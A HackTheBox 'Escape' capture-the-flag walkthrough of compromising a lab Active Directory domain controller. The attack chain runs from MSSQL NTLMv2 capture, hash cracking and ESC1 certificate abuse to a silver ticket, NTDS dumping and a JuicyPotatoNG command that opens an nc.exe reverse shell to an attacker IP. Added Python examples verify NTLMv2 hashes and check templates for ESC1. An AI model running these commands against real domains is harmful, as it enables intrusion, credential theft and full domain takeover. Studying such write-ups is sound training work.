HackTheBox - Escape
NMAP
Nmap scan report for 10.10.11.202
Host is up (0.26s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-26 22:30:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:00+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-26T03:01:12
| Not valid after: 2053-02-26T03:01:12
| MD5: 21884a6bf954052953ea17d7d48ef578
|_SHA-1: a5c4b21438d9864636d0923db5bc3785598f6364
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:00+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
Adding the FQDN (dc.sequel.htb and sequel.htb) to the /etc/hosts file.
PORT 139/445 (SMB)
Checking for null authentication on SMB, we see some shares. From the Public share we get a PDF document.
On the first page the document talks about accessing SQL Server from a non domain-joined machine and reveals three potential usernames: Tom, Brandon and Ryan.
On the next page we'll see the credentials.
Foothold
We can just try impacket's mssqlclient to log in to the database with the provided credentials:
mssqlclient.py PublicUser:GuestUserCantWrite1@sequel.htb
Trying to enable xp_cmdshell fails (it needs sysadmin rights, which PublicUser does not have).
With xp_dirtree, however, we can make the SQL Server service account connect to a share we control and capture its NTLMv2 response. An SMB listener such as Responder must be running on the attacker host (10.10.14.70) first:
xp_dirtree \\10.10.14.70\uwu
With hashcat (mode 5600, NetNTLMv2) we can crack the hash; the password is REGGIE1234ronnie.
With sql_svc's password we can enumerate domain users.
However, logging in to MSSQL with the service account fails.
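What hashcat does with a mode 5600 line, as an added example that is not part of the original writeup and not Responder's or hashcat's code: a pure-Python MD4 (hashlib's md4 is disabled on OpenSSL 3), the NT hash and NTLMv2 key derivation, and a check that recomputes NTProofStr for candidate passwords. The capture line is constructed with the file's own functions from a fixed challenge and a minimal blob; it is not a real capture from the box. The NT hash it prints is the same value the silver-ticket section feeds to ticketer.py.

```python
"""NTLMv2 (hashcat mode 5600) verification in pure Python.

Added example, not code from the writeup. SAMPLE_LINE is CONSTRUCTED below
from a fixed challenge/blob, not captured from the box.
"""
import hmac
import struct


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, implemented here because hashlib's md4 needs the OpenSSL legacy provider."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _lrot((a + fn(b, c, d) + X[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c              # rotate registers
        h = [(x + y) & mask for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 over the UTF-16LE password (what ticketer.py takes as -nthash)."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    # NTLMv2 key: HMAC-MD5(NT hash, UPPER(user) || domain), domain exactly as the client sent it
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    # NTProofStr = HMAC-MD5(NTLMv2 key, server challenge || client blob); this is what 5600 checks
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, "md5").digest()


def to_hashcat_5600(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def check_5600(line: str, candidates):
    """Return the candidate that reproduces NTProofStr, or None."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":", 5)
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for pw in candidates:
        if hmac.compare_digest(nt_proof(pw, user, domain, chal, blob), proof):
            return pw
    return None


# Constructed capture: fixed server challenge plus a minimal NTLMv2 blob (type, reserved,
# timestamp, client challenge, reserved). A real Responder blob also carries AV pairs.
_CHAL = bytes.fromhex("1122334455667788")
_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aabbccddeeff0011" + "00000000")
SAMPLE_LINE = to_hashcat_5600(
    "sql_svc", "sequel", _CHAL, nt_proof("REGGIE1234ronnie", "sql_svc", "sequel", _CHAL, _BLOB), _BLOB
)


def crack_sample():
    return check_5600(SAMPLE_LINE, ["Password1", "Summer2023!", "REGGIE1234ronnie"])


if __name__ == "__main__":
    print("NT hash:", nt_hash("REGGIE1234ronnie").hex())
    print("cracked:", crack_sample())
```

The domain field is kept case-sensitive and the user is upper-cased before the HMAC, which is the detail that makes a hand-edited capture line fail to crack.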
Running bloodhound to enumerate the domain
python3 /opt/BloodHound.py/bloodhound.py -d 'sequel.htb' -u 'sql_svc' -p 'REGGIE1234ronnie' -c all -ns 10.10.11.202
From BloodHound we can see this user has CanPSRemote on the DC, which means we can log in through WinRM:
evil-winrm -i sequel.htb -u 'sql_svc' -p 'REGGIE1234ronnie'
Privilege Escalation (Ryan.Cooper)
Checking C:\SQLServer\Logs\ERRORLOG.BAK
, we'll find the password for Ryan.Cooper
Privilege Escalation (Administrator)
After logging in as Ryan.Cooper, we use Certify to check for vulnerable certificate templates; it can be downloaded from here.
The UserAuthentication template lets the enrollee supply the subject alternative name (ESC1), so we can request a certificate for administrator:
./Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
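The template test that Certify automates, as an added example (not code from the writeup or from Certify): it evaluates the ESC1 conditions against template records. The attribute names are the real LDAP attributes on a certificate template object; the values are constructed to illustrate a vulnerable template and its hardened twin, not data pulled from the box.

```python
"""ESC1 template check. Added example; template records are constructed, not from the box."""

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CA manager approval

# EKUs that make a certificate usable for domain logon (PKINIT / Schannel)
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def allows_client_auth(ekus):
    """An empty pKIExtendedKeyUsage means unrestricted, which also permits client auth."""
    return not ekus or bool(CLIENT_AUTH_EKUS & set(ekus))


def esc1_conditions(tmpl):
    """Evaluate each ESC1 precondition; the template is ESC1 only when all of them hold."""
    return {
        "enrollee_supplies_subject": bool(tmpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no_manager_approval": not (tmpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": tmpl["msPKI-RA-Signature"] == 0,
        "client_auth_eku": allows_client_auth(tmpl["pKIExtendedKeyUsage"]),
        "low_priv_can_enroll": bool(LOW_PRIV_PRINCIPALS & set(tmpl["enrollment_rights"])),
    }


def is_esc1(tmpl):
    return all(esc1_conditions(tmpl).values())


def esc1_report(templates):
    """Names of the templates that satisfy every ESC1 condition."""
    return [t["name"] for t in templates if is_esc1(t)]


# Constructed sample: the shape of a template like UserAuthentication when it is ESC1.
VULNERABLE = {
    "name": "UserAuthentication",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0x00000000,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
    "enrollment_rights": ["Domain Users", "Domain Admins"],
}
# Same template with the flag cleared: the SAN now comes from the requester's AD object.
HARDENED = {**VULNERABLE, "name": "UserAuthentication-fixed", "msPKI-Certificate-Name-Flag": 0}
# Alternative fix: keep the flag but require CA manager approval for every request.
APPROVAL_REQUIRED = {**VULNERABLE, "name": "UserAuthentication-approval",
                     "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS}

if __name__ == "__main__":
    for t in (VULNERABLE, HARDENED, APPROVAL_REQUIRED):
        print(t["name"], esc1_conditions(t))
    print("ESC1:", esc1_report([VULNERABLE, HARDENED, APPROVAL_REQUIRED]))
```

Either fix alone breaks the chain: with the flag cleared the /altname value is ignored, and with manager approval the request sits pending instead of returning a certificate.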
Copy the certificate and key that Certify prints into a file cert.pem and convert it with openssl to a PKCS#12 file cert.pfx.
Transfer cert.pfx back to the Windows machine together with Rubeus, and use Rubeus (asktgt) with the certificate to get a TGT for administrator.
Convert the kirbi ticket to ccache (impacket's ticketConverter.py).
Run secretsdump.py with the ticket to dump NTDS.
Unintended
As sql_svc could not log in to MSSQL, we can instead forge a silver ticket to impersonate administrator on the MSSQL service. For that we need the NT hash of sql_svc and the domain SID.
import hashlib
# NT hash = MD4 over the UTF-16LE password; on OpenSSL 3 md4 is only available with the legacy provider
nt = hashlib.new('md4', 'REGGIE1234ronnie'.encode('utf-16le')).digest()
print(nt.hex())
Through rpcclient (lsaquery), we can get the domain SID.
With ticketer.py we can create the silver ticket for the MSSQLSvc SPN:
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -spn MSSQLSvc/dc.sequel.htb -domain sequel.htb -domain-sid S-1-5-21-4078382237-1492182817-2568127209 administrator
Before running mssqlclient, synchronize the clock with the DC using ntpdate (the nmap scan showed an 8h skew, and Kerberos rejects tickets outside a 5 minute window), then export the ccache via KRB5CCNAME and authenticate with the ticket:
sudo ntpdate dc.sequel.htb
mssqlclient.py dc.sequel.htb -k -no-pass
Now we can enable xp_cmdshell, transfer nc.exe and get a reverse shell.
Running whoami /all shows that SeImpersonatePrivilege is enabled, which we can abuse to get a SYSTEM token and eventually a SYSTEM shell.
With JuicyPotatoNG we can get a reverse shell as SYSTEM:
JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.70 80 -e cmd.exe"